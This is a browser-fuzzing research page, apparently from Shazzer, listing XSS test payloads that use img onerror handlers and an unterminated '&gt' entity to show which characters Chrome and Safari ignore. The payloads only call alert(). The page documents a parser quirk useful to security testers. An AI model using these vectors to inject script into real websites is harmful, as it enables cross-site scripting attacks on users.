Shazzer logo

Characters allowed after greater than in events

Chrome logo 31
Safari logo 31

This vector shows which characters are ignored after the greater than entity without a semi-colon

Created by: hackvertor

Created on: Friday, June 21, 2024 at 8:46:09 PM

Updated on: Tuesday, May 27, 2025 at 8:16:10 AM


Category: HTML Parsing

Vector visibility: Public

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="1&gt$[chr] log($[i])">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="1&gt alert(65279)">
<img src=data: onerror="1&gt
 alert(8232)">
<img src=data: onerror="1&gt> alert(62)">
<img src=data: onerror="1&gt~ alert(126)">
<img src=data: onerror="1&gt  alert(12288)">
<img src=data: onerror="1&gt  alert(8195)">
<img src=data: onerror="1&gt  alert(8192)">
<img src=data: onerror="1&gt  alert(8196)">
<img src=data: onerror="1&gt  alert(8198)">
<img src=data: onerror="1&gt! alert(33)">
<img src=data: onerror="1&gt
 alert(8233)">
<img src=data: onerror="1&gt- alert(45)">
<img src=data: onerror="1&gt  alert(160)">
<img src=data: onerror="1&gt  alert(8197)">
<img src=data: onerror="1&gt  alert(8200)">
<img src=data: onerror="1&gt+ alert(43)">
<img src=data: onerror="1&gt  alert(8202)">
<img src=data: onerror="1&gt  alert(32)">
<img src=data: onerror="1&gt  alert(5760)">
<img src=data: onerror="1&gt  alert(8194)">

Fuzz results

Chrome logo
Chrome 144.0.0.0 desktop Windows NT 10.0

Updated

Sun Jan 25 2026
Found 31 results
Loading...
Safari logo
Safari 17.5 mobile iOS 17.5.1

Updated

Fri Jun 21 2024
Found 31 results
Loading...